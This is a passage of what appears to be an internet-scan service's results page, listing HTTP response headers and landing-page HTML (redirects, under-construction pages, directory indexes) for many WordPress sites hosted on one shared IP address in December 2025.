    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · slotspin88.com

    2025-12-22 14:05

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    link: <https://slotspin88.com/wp-json/>; rel="https://api.w.org/"
    link: <https://slotspin88.com/wp-json/wp/v2/pages/106>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://slotspin88.com/>; rel=shortlink
    content-type: text/html; charset=utf-8
    server-timing: amp_sanitizer;dur="84.2",amp_style_sanitizer;dur="33.2",amp_tag_and_attribute_sanitizer;dur="41.9",amp_optimizer;dur="16.1"
    etag: "2327-1766408628;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 14:05:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nexuxtalentpartner.site

    2025-12-22 13:53

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://www.nexuxtalentpartner.site/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 13:53:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · kalangolaw.com

    2025-12-22 13:51

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    retry-after: 86400
    x-litespeed-cache-control: no-cache
    cache-control: no-cache, must-revalidate, max-age=0, no-store, private
    content-length: 2103
    date: Mon, 22 Dec 2025 13:51:31 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Kalangolaw is under construction
    
    <!doctype html>
    <html lang="en">
      <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Kalangolaw is under construction</title>
        <meta name="description" content="Kalangolaw" />
        <meta name="generator" content="Free UnderConstructionPage plugin for WordPress">
        <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Roboto:400,900">    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4.03" type="text/css">
    <link rel="icon" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/images/favicon.png" />
      </head>
    
      <body>
        <div id="hero-image">
          <img src="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/mad_designer/mad-designer.png" alt="Mad Designer at work" title="Mad Designer at work">
        </div>
        <div class="container">
    
          <div class="row">
            <div class="col-xs-12 col-md-12 col-lg-12">
              <h1>Sorry, we're doing some work on the site</h1>
            </div>
          </div>
    
          <div class="row">
            <div class="col-xs-12 col-md-8 col-md-offset-2 col-lg-offset-2 col-lg-8">
              <p class="content">Thank you for being patient. We are doing some work on the site and will be back shortly.</p>
            </div>
          </div>
    
          <div class="row" id="social">
            <div class="col-xs-12 col-md-12 col-lg-12">
              
            </div>
          </div>
    
        </div>
        
      </body>
    </html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.open-iptv.net

    2025-12-22 13:49

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://open-iptv.net/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 13:49:32 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · us.mealbox.online

    2025-12-22 13:41

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://us.mealbox.online/wp-json/>; rel="https://api.w.org/"
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: d52_home,d52_URL.6666cd76f96956469e7be39d750cc7d9,d52_F,d52_
    etag: "489-1766410919;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 13:41:59 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · jadecare.co.uk

    2025-12-22 13:18

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-length: 6368
    date: Mon, 22 Dec 2025 13:18:41 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: My Blog
    
    <!DOCTYPE html>
    
    <html lang="en-US">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>My Blog</title><meta name="description" content="My WordPress Blog"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="My Blog"/>
    <meta property="og:description" content="My WordPress Blog"/>
    <meta property="og:url" content="https://jadecare.co.uk"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="My Blog"/>
    <meta name="twitter:description" content="My WordPress Blog"/>
    <meta name="twitter:url" content="https://jadecare.co.uk"/>
    <meta name="twitter:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.15" type="text/css" media="all">
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="image" style="background-image:url('https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2.jpg')"></div>
            </div>
    
            
            <section class="section section-body">
                         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById('background-image');
                var body = document.getElementById('body');
                
                if ( image === null ) {
                    image = document.getElementById('body');
                } 
    
                if ( image != null ) {
                    if ( image.className !== 'image-unsplash') {
                        image.classList.add('loaded');
                        body.classList.add('loaded');
                    }
                }
    
                        }
        </script>
    
        
        <script>
            /* Subscribe form script */
            var ajaxWpUrl = 'https://jadecare.co.uk/wp-admin/admin-ajax.php';
            var {pathname} = new URL(ajaxWpUrl);
            var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`;
            var
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · mall.goodybuy.xyz

    2025-12-22 12:56

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    set-cookie: ibx_wpfomo_ip=138.68.82.23; expires=Thu, 22-Jan-2026 12:56:30 GMT; Max-Age=2678400; path=/; secure
    content-type: text/html; charset=UTF-8
    link: <https://mall.goodybuy.xyz/wp-json/>; rel="https://api.w.org/"
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 621_home,621_URL.6666cd76f96956469e7be39d750cc7d9,621_F,621_
    etag: "43032-1766408191;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 12:56:31 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · briliantsit.com

    2025-12-22 12:48

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.briliantsit.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 12:48:56 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · testnews.cdcit.in

    2025-12-22 12:25

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Mon, 22 Dec 2025 12:25:33 GMT
    server: LiteSpeed
    location: https://testnews.cdcit.in/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.promosambevcr.devdecimosite2025.com

    2025-12-22 12:24

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://promosambevcr.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 12:24:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · carelinkacademy.com

    2025-12-22 12:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Mon, 22 Dec 2025 12:03:44 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.dubaiforkliftrental.com

    2025-12-22 12:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    link: <https://www.dubaiforkliftrental.com/wp-json/>; rel="https://api.w.org/"
    link: <https://www.dubaiforkliftrental.com/wp-json/wp/v2/pages/12>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://www.dubaiforkliftrental.com/>; rel=shortlink
    etag: "2171-1766391680;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 12:03:40 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.carelinkacademy.com

    2025-12-22 11:48

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Mon, 22 Dec 2025 11:48:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nexashophub.online

    2025-12-22 11:42

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Mon, 22 Dec 2025 11:42:45 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.nexashophub.online/cgi-sys/suspendedpage.cgi
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rawgardenofficialstore.com

    2025-12-22 11:39

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Mon, 22 Dec 2025 11:39:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.kalangolaw.com

    2025-12-22 11:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    retry-after: 86400
    x-litespeed-cache-control: no-cache
    cache-control: no-cache, must-revalidate, max-age=0, no-store, private
    content-length: 2103
    date: Mon, 22 Dec 2025 11:16:13 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Kalangolaw is under construction
    
    <!doctype html>
    <html lang="en">
      <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Kalangolaw is under construction</title>
        <meta name="description" content="Kalangolaw" />
        <meta name="generator" content="Free UnderConstructionPage plugin for WordPress">
        <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Roboto:400,900">    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4.03" type="text/css">
    <link rel="icon" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/images/favicon.png" />
      </head>
    
      <body>
        <div id="hero-image">
          <img src="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/mad_designer/mad-designer.png" alt="Mad Designer at work" title="Mad Designer at work">
        </div>
        <div class="container">
    
          <div class="row">
            <div class="col-xs-12 col-md-12 col-lg-12">
              <h1>Sorry, we're doing some work on the site</h1>
            </div>
          </div>
    
          <div class="row">
            <div class="col-xs-12 col-md-8 col-md-offset-2 col-lg-offset-2 col-lg-8">
              <p class="content">Thank you for being patient. We are doing some work on the site and will be back shortly.</p>
            </div>
          </div>
    
          <div class="row" id="social">
            <div class="col-xs-12 col-md-12 col-lg-12">
              
            </div>
          </div>
    
        </div>
        
      </body>
    </html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.moyo.goodybuy.xyz

    2025-12-22 10:59

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    set-cookie: ibx_wpfomo_ip=142.93.0.66; expires=Thu, 22-Jan-2026 10:59:06 GMT; Max-Age=2678400; path=/; secure
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://moyo.goodybuy.xyz/
    x-litespeed-cache: miss
    content-length: 0
    date: Mon, 22 Dec 2025 10:59:06 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · cccapintel.com

    2025-12-22 10:41

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://cccapintel.com/wp-json/>; rel="https://api.w.org/"
    link: <https://cccapintel.com/wp-json/wp/v2/pages/16>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://cccapintel.com/>; rel=shortlink
    x-litespeed-cache-control: public,max-age=604800
    x-litespeed-tag: 492_front,492_URL.6666cd76f96956469e7be39d750cc7d9,492_F,492_Po.16,492_PGS,492_
    etag: "153-1766400064;;;"
    x-litespeed-cache: miss
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 10:41:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.thebronxjournal.com

    2025-12-22 10:32

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://thebronxjournal.com/
    content-length: 0
    date: Mon, 22 Dec 2025 10:33:00 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · atrixio.co.uk

    2025-12-22 10:27

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    link: <https://atrixio.co.uk/wp-json/>; rel="https://api.w.org/"
    link: <https://atrixio.co.uk/wp-json/wp/v2/pages/32>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://atrixio.co.uk/>; rel=shortlink
    cache-control: public, max-age=0
    expires: Mon, 22 Dec 2025 10:27:13 GMT
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 10:27:13 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rwd.ae

    2025-12-22 09:49

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.rwd.ae/
    content-length: 0
    date: Mon, 22 Dec 2025 09:49:25 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · bestdevicenation.com

    2025-12-22 09:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1598
    date: Mon, 22 Dec 2025 09:35:29 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="182461095">2025-09-30 19:38</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="error_log"><a href="/error_log"><img class="icon" src="/_autoindex/assets/icons/file.svg" alt="File">error_log</a></td><td data-sort="1761131958">2025-10-22 11:19</td><td data-sort="2242">      3k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at bestdevicenation.com Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · store.goyam.online

    2025-12-22 09:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://store.goyam.online/wp-json/>; rel="https://api.w.org/"
    etag: "455-1766294653;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Mon, 22 Dec 2025 09:35:06 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nexashophub.online

    2025-12-22 09:29

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Mon, 22 Dec 2025 09:29:07 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://nexashophub.online/cgi-sys/suspendedpage.cgi
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.goseguros.devdecimosite2025.com

    2025-12-22 09:07

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Mon, 22 Dec 2025 09:07:54 GMT
    server: LiteSpeed
    location: https://www.goseguros.devdecimosite2025.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.herbglow.cdcit.in

    2025-12-22 09:01

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1605
    date: Mon, 22 Dec 2025 09:01:54 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="185102818">2025-10-31 09:26</td><td data-sort="-1">-</td></tr>
    <tr><td data-sort="admin.php"><a href="/admin.php"><img class="icon" src="/_autoindex/assets/icons/file-text.svg" alt="[TXT]">admin.php</a></td><td data-sort="1762763910">2025-11-10 08:38</td><td data-sort="5362">      6k</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at www.herbglow.cdcit.in Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.tests.devdecimosite2025.com

    2025-12-22 08:33

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Mon, 22 Dec 2025 08:33:27 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2025-12-22 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.elegantlacebridal.cdcit.in

    2025-12-22 07:55

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1158
    date: Mon, 22 Dec 2025 07:55:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
